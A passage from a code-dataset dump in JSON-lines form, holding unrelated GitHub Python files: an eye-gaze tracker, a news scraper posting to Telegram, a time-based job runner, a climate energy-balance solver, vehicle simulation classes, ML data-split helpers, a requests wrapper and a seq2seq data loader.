gaze_ratio_horizontal_right_eye, gaze_ratio_vertical_right_eye = get_gaze_ratio([42, 43, 44, 45, 46, 47],\n                                                                                        landmarks)\n        gaze_ratio_horizontal = (gaze_ratio_horizontal_right_eye + gaze_ratio_horizontal_left_eye) / 2\n        gaze_ratio_vertical = (gaze_ratio_vertical_right_eye + gaze_ratio_vertical_left_eye) / 2\n\n        # cv2.putText(frame, str(gaze_ratio_left_eye), (50, 100), font, 2, (0, 0, 255), 3)\n        # cv2.putText(frame, str(gaze_ratio_right_eye), (50, 150), font, 2, (0, 0, 255), 3)\n        # cv2.putText(frame, str(gaze_ratio_vertical), (50, 200), font, 2, (0, 0, 255), 3)\n\n        if gaze_ratio_vertical < 0.36:\n            cv2.putText(frame, \"UPPER\", (50, 100), font, 2, (0, 0, 255), 3)\n        elif gaze_ratio_horizontal < 0.5:\n            cv2.putText(frame, \"RIGHT\", (50, 100), font, 2, (0, 0, 255), 
3)\n elif 0.5 < gaze_ratio_horizontal < 2:\n cv2.putText(frame, \"CENTER\", (50, 100), font, 2, (0, 0, 255), 3)\n else:\n cv2.putText(frame, \"LEFT\", (50, 100), font, 2, (0, 0, 255), 3)\n\n #\n # if gaze_ratio_horizontal < 0.5:\n # cv2.putText(frame, \"RIGHT\", (50, 100), font, 2, (0, 0, 255), 3)\n # elif 0.5 < gaze_ratio_horizontal < 2:\n # cv2.putText(frame, \"CENTER\", (50, 100), font, 2, (0, 0, 255), 3)\n # else:\n # cv2.putText(frame, \"LEFT\", (50, 100), font, 2, (0, 0, 255), 3)\n\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1)\n if key == 27:\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","repo_name":"oguzhan-serttas/eye-gaze-direction","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6225,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"42888556891","text":"import re\n\nimport fake_useragent\nimport requests\nimport tools\nfrom bs4 import BeautifulSoup\nfrom datetime import datetime, timedelta\nimport time\ntry:\n r = tools.conn('https://akipress.org/')\n soup = BeautifulSoup(r, 'html.parser')\n t0 = soup.find('table', {'class': 'sections section-last'})\n houp = BeautifulSoup(str(t0), 'html.parser')\n t = houp.find_all('td', {'class':'datetxt'})\n t1 = houp.find_all('a', {'class':'newslink'})\n for j in range(0, 20):\n l1 = t[j].text\n l1= ' '.join(l1.split())\n if l1 != '':\n t2 = str(t1[j])\n s = t[j].text\n s = s[1:6]\n link = t2[str.find(t2, 'href') + 7:]\n if requests.get('https://akipress.org' + link[:str.find(link, '\"')]).status_code != 404:\n link = 'https://akipress.org' + link[:str.find(link, '\"')]\n else:\n if requests.get('https:/'+link[:str.find(link, '\"')]).status_code != 404:\n link = 'https:/'+link[:str.find(link, '\"')]\n else:\n link = link[:str.find(link, '\"')]\n lead_head = t1[j].text\n\n time_head = datetime.strptime(datetime.today().strftime('%d_%m_%Y') + '|' + s,\n \"%d_%m_%Y|%H:%M\")\n if time_head - timedelta(hours=3) < datetime.today():\n if time_head - timedelta(hours=3) > datetime.today() - timedelta(seconds=359):\n pic = ''\n second_head = ''\n try:\n r = tools.conn(link)\n loup = BeautifulSoup(r, 'html.parser')\n x1 = loup.find('meta', {'property':'og:image'})\n pigs = str(x1)\n pic = pigs[str.find(pigs, 'content') + 9:]\n pic = pic[:str.find(pic, '\"')]\n if str.find(pic, 'https:') == -1:\n pic = 'https:' + pic\n x2 = loup.find('meta', {'property': 'og:description'})\n pigs = str(x2)\n second_head = pigs[str.find(pigs, 'content') + 9:]\n second_head = second_head[:str.find(second_head, '\"')]\n if str.find(pic, 'https:') == -1:\n pic = 'https:' + pic\n except Exception as exx:\n pic = 'img//akipress_logo.png'\n print(exx)\n tools.tg_post(lead_head, second_head, link)\n print(pic)\nexcept Exception as exx:\n print(exx)","repo_name":"AndrewOdn/RandomParsers","sub_path":"akipress.py","file_name":"akipress.py","file_ext":"py","file_size_in_byte":2638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"22106168426","text":"import datetime\nimport time\nimport os\n\n\ndotime = [(14, 26), (14, 27)] # [小时,分钟]\ndocommand =\"echo 'sx'\"\n\n\ndef do():\n val = os.system(docommand)\n # print(\"val1:%s\" % val)\n if val == 0:\n print(\"运行成功\")\n else:\n print(\"失败啦\")\n time.sleep(66)\n\n\ndef main():\n ifdo = False\n while True:\n while True:\n now = datetime.datetime.now()\n # print(now)\n # print(\"now %s:%s\" % (now.hour, now.minute))\n for h, m in dotime:\n if now.hour == h and now.minute == 
m:\n ifdo = True\n break\n if ifdo == True:\n break\n time.sleep(18)\n # print(\"h:m %s:%s\" % (h, m))\n do()\n ifdo = False\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"MeawHB/hey","sub_path":"定时.py","file_name":"定时.py","file_ext":"py","file_size_in_byte":820,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"13890079820","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 11.11.2020\n\n@author: Olav Milian\n\"\"\"\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport scipy.sparse as sparse\nfrom scipy.sparse.linalg import spsolve, lsqr\n\n# some constants\nG_SC = 1360\nA_out = 201.4\nB_out = 1.45\ns2 = -0.477\nau = 0.38\nal = 0.68\nk = 0.34 #OBS!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!\nR_e = 6.3781e6\nD = 0.649 #k / R_e\nT_s = -10\n# The goal for Q\nQ_goal = G_SC / 4\n\n# the co-albedo\ndef a(xvec, x_s):\n # xvec - array of x values\n # x_s - parameter for ice-cap location\n if isinstance(xvec, (int, float)):\n xvec = np.asarray([xvec])\n\n # initialize the output vector\n avec = np.zeros_like(xvec)\n # indices\n argu = np.nonzero(xvec > x_s)\n argl = np.nonzero(xvec < x_s)\n args = np.nonzero(xvec == x_s)\n # set the values\n avec[argu] = au\n avec[argl] = al\n avec[args] = (au + al) / 2\n return avec\n\n# the annual average\nS = lambda x: 1 + s2 * (3 * x * x - 1) / 2\n\n# function to get the FDM matrix A\ndef getAbF(N, x_s):\n # the grid size\n h = 1 / (N + 1)\n # define 1/h^2 as a constant\n hh = h * h\n # values of x in the uniform grid\n xvec = np.linspace(0, 1, N + 2)\n # initialize A and b\n A = sparse.dok_matrix((N+2, N+2))\n b = - A_out * np.ones(N+2)\n F = a(xvec, x_s) * S(xvec)\n\n # Internal nodes\n for i in range(1, N+1):\n xi = xvec[i]\n A[i, i] = D * (1 - xi * xi) * 2 / hh + B_out\n A[i, i+1] = - D * ((1 - xi * xi) / hh + xi / h)\n A[i, i-1] = - D * ((1 - xi * xi) / hh - xi / h)\n\n # BC x=0\n A[0, 0] = - 1 / h\n A[0, 1] = 1 / h\n b[0] = 0\n F[0] = 0\n\n # BC x=1\n A[N+1, N+1] = - D / h + B_out\n A[N+1, N] = D / h\n # F[N+1] = a(1, x_s) * S(1)\n return A, b, F\n\ndef Solve_bvp(N, x_s, Q):\n # the x - vector\n xvec = np.linspace(0, 1, N + 2)\n # get A, b and F\n A, b, F = getAbF(N, x_s)\n # solve the system for given Q\n Tvec = spsolve(A.tocsr(), b + Q_goal * F)\n\n return xvec, Tvec\n\n\ndef plotTx(xvec, Tvec, x_s):\n plt.figure()\n\n plt.plot(xvec, Tvec, label=\"$T(x)$\")\n plt.plot(x_s, T_s, 'ro', label=\"$(x_s, T_s)$\")\n plt.hlines(-10, xmin=0, xmax=1, linestyles='--', color='k', label='$T_s=-10^{\\circ}C$')\n T_mean = np.mean(Tvec)\n plt.hlines(T_mean, xmin=0, xmax=1, linestyles='--', color='g',\n label='$T_{avg}=' + '{:.2f}'.format(T_mean) +'^{\\circ}C$')\n plt.grid()\n plt.xlim(0, 1)\n plt.xlabel(\"$x$\")\n plt.ylabel(\"Temperature, $^{\\circ}C$\")\n plt.legend(loc=9, bbox_to_anchor=(0.5, -0.11), ncol=4)\n plt.title(\"Temperature, $T(x)$\")\n plt.show()\n\ndef Q_finder(N, x_s):\n # get A, b, F\n A, b, F = getAbF(N, x_s)\n # the step size\n h = 1 / (N + 1)\n # values of x in the uniform grid\n xvec = np.linspace(0, 1, N + 2)\n # index of the largest x smaller than x_s\n k = int(x_s / h)\n # call it xk\n xk = xvec[k]\n xk1 = xvec[k + 1]\n\n\n Abar = sparse.lil_matrix((N + 3, N + 3))\n # insert A into Abar\n Abar[:-1, :-1] = A\n # insert F into Abar\n Abar[:-1, -1] = - F.reshape((N + 2, 1)) # make column-vector of the row-vector\n\n Abar[-1, k] = (xk1 - x_s) / h\n Abar[-1, k+1] = (x_s - xk) / h\n Fbar = np.zeros(N+3)\n Fbar[:-1] = b\n Fbar[-1] = -10\n\n TQvec = 
spsolve(Abar.tocsr(), Fbar)\n Q = TQvec[-1]\n Tvec = TQvec[:-1]\n print(Q, Q_goal, abs(Q - Q_goal))\n print((xk1 - x_s) / h * TQvec[k] + (x_s - xk) / h * TQvec[k+1])\n\n # Tvec = spsolve(A.tocsr(), b + Q * F)\n plotTx(xvec, Tvec, x_s)\n\n Tvec = spsolve(A.tocsr(), b + Q_goal * F)\n plotTx(xvec, Tvec, x_s)\n\nQ_finder(N=500, x_s=0.95)\n\n\n\n\n\n\n\n\n\n\n\n# number of interior nodes\nN = 500\n# position of ice cap.\nx_s = 0.77\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"OlavMSG/MatMod-Project-fall-2020","sub_path":"Question8FDMforTQ.py","file_name":"Question8FDMforTQ.py","file_ext":"py","file_size_in_byte":3700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"34951190032","text":"import json\nimport os\n\n\nroot = os.getcwd()\nvalues = json.load(open(root + '\\\\values\\\\num.json'))['udp_data']['road_data']\n\n\nclass Vehicle(object):\n\n def __init__(self, partnr, vehicletype, position, dynamics):\n self.partnr = partnr\n self.type = vehicletype\n self.position = position\n self.dynamics = dynamics\n\n self.time_to_inter = None\n self.time_to_inter_front = None\n self.time_to_inter_back = None\n\n def timeToInter(self, dis_to_inter=None):\n if dis_to_inter is None:\n dis_to_inter = self.disToInter()\n\n if self.dynamics.velocity != 0:\n self.time_to_inter = dis_to_inter / self.dynamics.velocity\n self.time_to_inter_front = (dis_to_inter - self.type.carlength / 2) / self.dynamics.velocity\n self.time_to_inter_back = (dis_to_inter + self.type.carlength / 2) / self.dynamics.velocity\n else:\n self.time_to_inter = -1\n self.time_to_inter_front = -1\n self.time_to_inter_back = -1\n\n def getDuration(self):\n return abs(self.time_to_inter_back - self.time_to_inter_front)\n\n def disToInter(self):\n xpos_lane = values['xpos_end_merginglane']\n return xpos_lane - self.position.xpos\n\n def front(self):\n return self.position.xpos + self.type.carlength / 2\n\n def back(self):\n return self.position.xpos - self.type.carlength / 2\n\n\nclass Type(object):\n\n def __init__(self, cartype, carlength):\n self.cartype = cartype\n self.carlength = carlength\n\n\nclass Position(object):\n\n def __init__(self, xpos, ypos, heading, lane, segment):\n self.xpos = xpos\n self.ypos = ypos\n self.heading = heading\n self.lane = lane\n self.segment = segment\n\n\nclass Dynamics(object):\n\n def __init__(self, velocity, dis_to_inter, acc=0):\n self.velocity = velocity\n self.dis_to_inter = dis_to_inter\n self.acc = acc\n\n\nclass MainVehicle(Vehicle):\n\n def __init__(self, partnr, vehicletype, position, dynamics):\n super(). 
__init__(partnr, vehicletype, position, dynamics)\n        self.min_speed = 70 / 3.6\n        self.max_acc = 0.23\n        self.max_speed = 90\n        self.min_advisory = 60\n\n\n\n","repo_name":"suitendaal/HMI","sub_path":"classes/vehicle_STsoftware.py","file_name":"vehicle_STsoftware.py","file_ext":"py","file_size_in_byte":2242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"9410627261","text":"import pandas as pd\nimport numpy as np\n\nfrom sklearn.model_selection import train_test_split\n\ndef calculate_cyclic_encoding(Column: pd.Series, range_size: int, mode: str = 'sin'):\n    if mode == 'cos':\n        return np.cos(Column*(2.*np.pi/range_size))\n    else:\n        return np.sin(Column*(2.*np.pi/range_size))\n\ndef my_train_valid_split(Data: pd.DataFrame, target_col:str, random_seed:int,\n                         split_data: str, validation_data_size: float = 0.2,\n                         stratify:bool = False):\n    \n    if split_data == 'chronological':\n        Data = Data.sort_values('order_time')\n        split_index = int(np.round(len(Data) * (1-validation_data_size)))\n        Data_train = Data.iloc[:split_index].copy()\n        Data_valid = Data.iloc[split_index:].copy()\n\n        X_train = Data_train.drop([target_col,'order_time'],axis=1)\n        y_train = Data_train[target_col]\n        X_valid = Data_valid.drop([target_col,'order_time'],axis=1)\n        y_valid = Data_valid[target_col]\n\n    elif split_data == 'normal':\n        if stratify:\n            stratify_col = Data[target_col]\n        else:\n            stratify_col = None\n        \n        X_train, X_valid, y_train, y_valid = train_test_split(Data.drop([target_col,'order_time'], axis=1),\n                                                              Data[target_col],\n                                                              test_size=validation_data_size,\n                                                              stratify=stratify_col,\n                                                              random_state=random_seed)\n    else:\n        raise ValueError(\"Unrecognised split type: %s. Options are: ['normal', 'chronological']\" % split_data)\n\n    return (X_train, X_valid, y_train, y_valid)\n    ","repo_name":"amr-jawwad/dragon-fruit","sub_path":"dragon_fruit/calculation_functions/HelperFunctions.py","file_name":"HelperFunctions.py","file_ext":"py","file_size_in_byte":1770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"73315214885","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nA thin wrapper around requests\n\"\"\"\n\n# Install requests first:\n# pip install requests\n\nimport random\nimport requests\nfrom requests.exceptions import ConnectionError, Timeout\n\n\ndef requests_get(url, **kwargs):\n    USER_AGENTS = (\n        'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.7; rv:11.0) Gecko/20100101 Firefox/11.0',\n        'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100 101 Firefox/22.0',\n        'Mozilla/5.0 (Windows NT 6.1; rv:11.0) Gecko/20100101 Firefox/11.0',\n        ('Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/536.5 (KHTML, like Gecko) '\n         'Chrome/19.0.1084.46 Safari/536.5'),\n        ('Mozilla/5.0 (Windows; Windows NT 6.1) AppleWebKit/536.5 (KHTML, like Gecko) Chrome/19.0.1084.46'\n         'Safari/536.5')\n    )\n\n    # If you need a proxy, uncomment the block below\n    # PROXIES = {\n    #     \"http\": \"http://user:password@proxy:port\",\n    # }\n\n    r = None  # stays None (and is returned as such) if the request fails\n    try:\n        r = requests.get(\n            url,\n            timeout=30,\n            headers={'User-Agent': random.choice(USER_AGENTS)},\n            # proxies=PROXIES,\n            **kwargs\n        )\n    except ConnectionError:\n        print('Network connection failed.')\n    except Timeout:\n        print('timeout.')\n    return r\n","repo_name":"bonfy/python-notes","sub_path":"1_requests.py","file_name":"1_requests.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"15418217709","text":"from random import randint, shuffle, choice\nfrom random import random as 
rand\nimport math\nimport torch\n\nfrom loader_utils import get_random_word, batch_list_to_batch_tensors, Pipeline\nTopK = 1\n\n# Input file format :\n# 1. One sentence per line. These should ideally be actual sentences,\n# not entire paragraphs or arbitrary spans of text. (Because we use\n# the sentence boundaries for the \"next sentence prediction\" task).\n# 2. Blank lines between documents. Document boundaries are needed\n# so that the \"next sentence prediction\" task doesn't span between documents.\n\n\ndef truncate_tokens_pair(tokens_a, tokens_b, max_len, max_len_a=0, max_len_b=0, trunc_seg=None, always_truncate_tail=False):\n\tnum_truncated_a = [0, 0]\n\tnum_truncated_b = [0, 0]\n\twhile True:\n\t\tif len(tokens_a) + len(tokens_b) <= max_len:\n\t\t\tbreak\n\t\tif (max_len_a > 0) and len(tokens_a) > max_len_a:\n\t\t\ttrunc_tokens = tokens_a\n\t\t\tnum_truncated = num_truncated_a\n\t\telif (max_len_b > 0) and len(tokens_b) > max_len_b:\n\t\t\ttrunc_tokens = tokens_b\n\t\t\tnum_truncated = num_truncated_b\n\t\telif trunc_seg:\n\t\t\t# truncate the specified segment\n\t\t\tif trunc_seg == 'a':\n\t\t\t\ttrunc_tokens = tokens_a\n\t\t\t\tnum_truncated = num_truncated_a\n\t\t\telse:\n\t\t\t\ttrunc_tokens = tokens_b\n\t\t\t\tnum_truncated = num_truncated_b\n\t\telse:\n\t\t\t# truncate the longer segment\n\t\t\tif len(tokens_a) > len(tokens_b):\n\t\t\t\ttrunc_tokens = tokens_a\n\t\t\t\tnum_truncated = num_truncated_a\n\t\t\telse:\n\t\t\t\ttrunc_tokens = tokens_b\n\t\t\t\tnum_truncated = num_truncated_b\n\t\t# whether always truncate source sequences\n\t\tif (not always_truncate_tail) and (rand() < 0.5):\n\t\t\tdel trunc_tokens[0]\n\t\t\tnum_truncated[0] += 1\n\t\telse:\n\t\t\ttrunc_tokens.pop()\n\t\t\tnum_truncated[1] += 1\n\treturn num_truncated_a, num_truncated_b\n\n\nclass C_Seq2SeqDataset(torch.utils.data.Dataset):\n\t\"\"\" Load sentence pair (sequential or random order) from corpus \"\"\"\n\n\tdef __init__(self, file_src, file_tgt, batch_size, tokenizer, max_len, file_oracle=None, short_sampling_prob=0.1,\n\t\t\t\t sent_reverse_order=False, bi_uni_pipeline=[]):\n\t\tsuper().__init__()\n\t\tself.tokenizer = tokenizer # tokenize function\n\t\tself.max_len = max_len # maximum length of tokens\n\t\tself.short_sampling_prob = short_sampling_prob\n\t\tself.bi_uni_pipeline = bi_uni_pipeline\n\t\tself.batch_size = batch_size\n\t\tself.sent_reverse_order = sent_reverse_order\n\n\t\t# read the file into memory\n\t\tself.ex_list = []\n\t\tif file_oracle is None:\n\t\t\twith open(file_src, \"r\", encoding='utf-8') as f_src, open(file_tgt, \"r\", encoding='utf-8') as f_tgt:\n\n\t\t\t\tf_check = \".\"\n\n\t\t\t\tfor src, tgt in zip(f_src, f_tgt):\n\t\t\t\t\tsrc = src.split(\"[SEP]\")\n\t\t\t\t\ttgt = tgt.split(\"[SEP]\")\n\t\t\t\t\tcheck = f_check.split(\"[SEP]\")\n\t\t\t\t\t\n\n\t\t\t\t\tsrc_tk = tokenizer.tokenize(src[0].strip())\n\t\t\t\t\ttgt_tk = tokenizer.tokenize(tgt[0].strip())\n\t\t\t\t\tcheck_tk = tokenizer.tokenize(check[0].strip())\n\t\t\t\t\tassert len(src_tk) > 0\n\t\t\t\t\tassert len(tgt_tk) > 0\n\t\t\t\t\tassert len(check_tk) > 0\n\n\t\t\t\t\tfor t in range(len(tgt_tk)):\n\t\t\t\t\t\tsrc_tk_list = []\n\t\t\t\t\t\ttgt_tk_list = []\n\t\t\t\t\t\tcheck_tk_list = []\n\n\t\t\t\t\t\tsrc_tk_list.append(src_tk)\n\t\t\t\t\t\ttgt_tk_list.append(tgt_tk[:t+1])\n\t\t\t\t\t\tcheck_tk_list.append(check_tk)\n\n\t\t\t\t\t\tself.ex_list.append((src_tk_list, tgt_tk_list, check_tk_list))\n\t\tprint('Load {0} documents'.format(len(self.ex_list)))\n\n\tdef __len__(self):\n\t\treturn 
len(self.ex_list)\n\n\tdef __getitem__(self, idx):\n\t\tinstance = self.ex_list[idx]\n\t\tproc = choice(self.bi_uni_pipeline)\n\t\tinstance = proc(instance)\n\t\treturn instance\n\n\tdef __iter__(self): # iterator to load data\n\t\tfor __ in range(math.ceil(len(self.ex_list) / float(self.batch_size))):\n\t\t\tbatch = []\n\t\t\tfor __ in range(self.batch_size):\n\t\t\t\tidx = randint(0, len(self.ex_list) - 1)\n\t\t\t\tbatch.append(self.__getitem__(idx))\n\t\t\t# To Tensor\n\t\t\tyield batch_list_to_batch_tensors(batch)\n\n\nclass C_Preprocess4Seq2seq(Pipeline):\n\t\"\"\" Pre-processing steps for pretraining transformer \"\"\"\n\n\tdef __init__(self, max_pred, mask_prob, vocab_words, indexer, max_len=512, skipgram_prb=0, skipgram_size=0,\n\t\t\t\t block_mask=False, mask_whole_word=False, new_segment_ids=False, truncate_config={},\n\t\t\t\t mask_source_words=False, mode=\"s2s\", has_oracle=False, num_qkv=0, s2s_special_token=False,\n\t\t\t\t s2s_add_segment=False, s2s_share_segment=False, pos_shift=False):\n\t\tsuper().__init__()\n\t\tself.max_len = max_len\n\t\tself.max_pred = max_pred # max tokens of prediction\n\t\tself.mask_prob = mask_prob # masking probability\n\t\tself.vocab_words = vocab_words # vocabulary (sub)words\n\t\tself.indexer = indexer # function from token to token index\n\t\tself.max_len = max_len\n\t\tself._tril_matrix = torch.tril(torch.ones(\n\t\t\t(max_len, max_len), dtype=torch.long))\n\t\tself.skipgram_prb = skipgram_prb\n\t\tself.skipgram_size = skipgram_size\n\t\tself.mask_whole_word = mask_whole_word\n\t\tself.new_segment_ids = new_segment_ids\n\t\tself.always_truncate_tail = truncate_config.get(\n\t\t\t'always_truncate_tail', False)\n\t\tself.max_len_a = truncate_config.get('max_len_a', None)\n\t\tself.max_len_b = truncate_config.get('max_len_b', None)\n\t\tself.trunc_seg = truncate_config.get('trunc_seg', None)\n\t\tself.task_idx = 3 # relax projection layer for different tasks\n\t\tself.mask_source_words = mask_source_words\n\t\tassert mode in (\"s2s\", \"l2r\")\n\t\tself.mode = mode\n\t\tself.has_oracle = has_oracle\n\t\tself.num_qkv = num_qkv\n\t\tself.s2s_special_token = s2s_special_token\n\t\tself.s2s_add_segment = s2s_add_segment\n\t\tself.s2s_share_segment = s2s_share_segment\n\t\tself.pos_shift = pos_shift\n\n\tdef __call__(self, instance):\n\t\tinput_ids_list = []\n\t\tsegment_ids_list = []\n\t\tinput_mask_list = []\n\t\tmasked_ids_list = []\n\t\tmasked_pos_list = []\n\t\tmasked_weights_list = []\n\t\ttgt_pos_list = []\n\t\tlabels_list = []\n\t\tks_labels_list = []\n\t\tcheck_ids_list = []\n\n\t\ttokens_a_list, tokens_b_list, check_list = instance[:3]\n\n\n\t\tfor rank in range(TopK):\n\n\t\t\ttokens_a = tokens_a_list[rank]\n\t\t\ttokens_b = tokens_b_list[rank]\n\t\t\tcheck_tokens = check_list[rank][:self.max_pred]\n\n\t\t\t#######\n\t\t\tcheck_ids = self.indexer(check_tokens)\n\t\t\t# Zero Padding\n\t\t\tcheck_n_pad = self.max_pred - len(check_ids)\n\t\t\tcheck_ids.extend([0] * check_n_pad)\n\t\t\tassert len(check_ids) == self.max_pred\n\t\t\t########\n\n\t\t\ttokens_a = [\".\"] + tokens_a[:-1]\n\n\t\t\tlabels = torch.tensor(0.1)\n\t\t\tks_labels = torch.tensor(1)\n\t\t\ttokens_b = tokens_b\n\n\n\t\t\tif self.pos_shift:\n\t\t\t\ttokens_b = ['[S2S_SOS]'] + tokens_b\n\n\t\t\t# -3 for special tokens [CLS], [SEP], [SEP]\n\t\t\tnum_truncated_a, _ = truncate_tokens_pair(tokens_a, tokens_b, self.max_len - 3, max_len_a=self.max_len_a,\n\t\t\t\t\t\t\t\t\t\t\t\t\t max_len_b=self.max_len_b, trunc_seg=self.trunc_seg,\n\t\t\t\t\t\t\t\t\t\t\t\t\t 
always_truncate_tail=self.always_truncate_tail)\n\n\t\t\t#process tokens_a all_len == 213; tokens_b max len = 40\n\t\t\ttokens_a = tokens_a[:213]\n\t\t\twhile len(tokens_a) < 213:\n\t\t\t\ttokens_a.extend([\"[PAD]\"])\n\t\t\ttokens_b = tokens_b[:40]\n\n\n\t\t\t# Add Special Tokens\n\t\t\tif self.s2s_special_token:\n\t\t\t\ttokens = ['[S2S_CLS]'] + tokens_a + \\\n\t\t\t\t\t\t ['[S2S_SEP]'] + tokens_b + ['[SEP]']\n\t\t\telse:\n\t\t\t\ttokens = ['[CLS]'] + tokens_a + ['[SEP]'] + tokens_b + ['[SEP]']\n\n\t\t\tif self.new_segment_ids:\n\t\t\t\tif self.mode == \"s2s\":\n\t\t\t\t\tif self.s2s_add_segment:\n\t\t\t\t\t\tif self.s2s_share_segment:\n\t\t\t\t\t\t\tsegment_ids = [0] + [1] * \\\n\t\t\t\t\t\t\t\t\t\t (len(tokens_a) + 1) + [5] * (len(tokens_b) + 1)\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tsegment_ids = [4] + [6] * \\\n\t\t\t\t\t\t\t\t\t\t (len(tokens_a) + 1) + [5] * (len(tokens_b) + 1)\n\t\t\t\t\telse:\n\t\t\t\t\t\tsegment_ids = [4] * (len(tokens_a) + 2) + \\\n\t\t\t\t\t\t\t\t\t [5] * (len(tokens_b) + 1)\n\t\t\t\telse:\n\t\t\t\t\tsegment_ids = [2] * (len(tokens))\n\t\t\telse:\n\t\t\t\tsegment_ids = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)\n\n\t\t\tif self.pos_shift:\n\t\t\t\tn_pred = min(self.max_pred, len(tokens_b))\n\t\t\t\tmasked_pos = [len(tokens_a) + 2 + i for i in range(len(tokens_b))]\n\t\t\t\tmasked_weights = [1] * n_pred\n\t\t\t\tmasked_ids = self.indexer(tokens_b[1:] + ['[SEP]'])\n\t\t\telse:\n\t\t\t\t# For masked Language Models\n\t\t\t\t# the number of prediction is sometimes less than max_pred when sequence is short\n\t\t\t\teffective_length = len(tokens_b)\n\t\t\t\tif self.mask_source_words:\n\t\t\t\t\teffective_length += len(tokens_a)\n\t\t\t\tn_pred = min(self.max_pred, max(\n\t\t\t\t\t1, int(round(effective_length * self.mask_prob))))\n\n\t\t\t\t# candidate positions of masked tokens\n\t\t\t\tcand_pos = []\n\t\t\t\tspecial_pos = set()\n\t\t\t\tfor i, tk in enumerate(tokens):\n\t\t\t\t\t# only mask tokens_b (target sequence)\n\t\t\t\t\t# we will mask [SEP] as an ending symbol\n\t\t\t\t\tif (i >= len(tokens_a) + 2) and (tk != '[CLS]'):\n\t\t\t\t\t\tcand_pos.append(i)\n\t\t\t\t\telif self.mask_source_words and (i < len(tokens_a) + 2) and (tk != '[CLS]') and (\n\t\t\t\t\tnot tk.startswith('[SEP')):\n\t\t\t\t\t\tcand_pos.append(i)\n\t\t\t\t\telse:\n\t\t\t\t\t\tspecial_pos.add(i)\n\t\t\t\tmax_cand_pos = max(cand_pos)\n\n\t\t\t\tmasked_pos = list([max_cand_pos-1])\n\t\t\t\tif len(masked_pos) > n_pred:\n\t\t\t\t\tshuffle(masked_pos)\n\t\t\t\t\tmasked_pos = masked_pos[:n_pred]\n\n\t\t\t\tmasked_tokens = [tokens[pos] for pos in masked_pos]\n\t\t\t\tfor pos in masked_pos:\n\t\t\t\t\tif rand() < 0.8: # 80%\n\t\t\t\t\t\ttokens[pos] = '[MASK]'\n\t\t\t\t\telif rand() < 0.5: # 10%\n\t\t\t\t\t\ttokens[pos] = get_random_word(self.vocab_words)\n\t\t\t\t# when n_pred < max_pred, we only calculate loss within n_pred\n\t\t\t\tmasked_weights = [1] * len(masked_tokens)\n\n\t\t\t\t# Token Indexing\n\t\t\t\tmasked_ids = self.indexer(masked_tokens)\n\t\t\t# Token Indexing\n\t\t\tinput_ids = self.indexer(tokens)\n\n\t\t\t# Zero Padding\n\t\t\tn_pad = self.max_len - len(input_ids)\n\t\t\tinput_ids.extend([0] * n_pad)\n\t\t\tsegment_ids.extend([0] * n_pad)\n\n\t\t\tif self.num_qkv > 1:\n\t\t\t\tmask_qkv = [0] * (len(tokens_a) + 2) + [1] * (len(tokens_b) + 1)\n\t\t\t\tmask_qkv.extend([0] * n_pad)\n\t\t\telse:\n\t\t\t\tmask_qkv = None\n\n\t\t\tinput_mask = torch.zeros(self.max_len, self.max_len, dtype=torch.long)\n\t\t\tif self.mode == \"s2s\":\n\t\t\t\tinput_mask[:, :len(tokens_a) + 
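# --- Illustrative aside (not part of the record above): the rand() < 0.8 /
# rand() < 0.5 branch above realises the BERT-style corruption split, i.e.
# P(mask) = 0.8, P(random word) = 0.2 * 0.5 = 0.1, P(keep) = 0.1.
# An equivalent single-draw sketch, with a stand-in vocabulary:
# from random import random, choice
# def corrupt(token, vocab=("stand", "in", "words")):
#     r = random()
#     if r < 0.8:
#         return '[MASK]'        # 80%: replace with the mask token
#     elif r < 0.9:
#         return choice(vocab)   # 10%: replace with a random word
#     return token               # 10%: keep the original token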
2].fill_(1)\n\t\t\t\tsecond_st, second_end = len(\n\t\t\t\t\ttokens_a) + 2, len(tokens_a) + len(tokens_b) + 3\n\t\t\t\tinput_mask[second_st:second_end, second_st:second_end].copy_(\n\t\t\t\t\tself._tril_matrix[:second_end - second_st, :second_end - second_st])\n\t\t\telse:\n\t\t\t\tst, end = 0, len(tokens_a) + len(tokens_b) + 3\n\t\t\t\tinput_mask[st:end, st:end].copy_(self._tril_matrix[:end, :end])\n\n\t\t\t# Zero Padding for masked target\n\t\t\tif self.max_pred > n_pred:\n\t\t\t\tn_pad = self.max_pred - n_pred\n\t\t\t\tif masked_ids is not None:\n\t\t\t\t\tmasked_ids.extend([0] * n_pad)\n\t\t\t\tif masked_pos is not None:\n\t\t\t\t\tmasked_pos.extend([0] * n_pad)\n\t\t\t\tif masked_weights is not None:\n\t\t\t\t\tmasked_weights.extend([0] * n_pad)\n\n\t\t\ttgt_pos = []\n\t\t\tfor i, tk in enumerate(tokens):\n\t\t\t\tif (i >= len(tokens_a) + 2) and (tk != '[CLS]' and tk != '[SEP]'):\n\t\t\t\t\ttgt_pos.append(i)\n\n\t\t\ttgt_pos = tgt_pos[:len(masked_pos)]\n\t\t\ttgt_pad = len(masked_pos) - len(tgt_pos)\n\t\t\ttgt_pos.extend([0] * 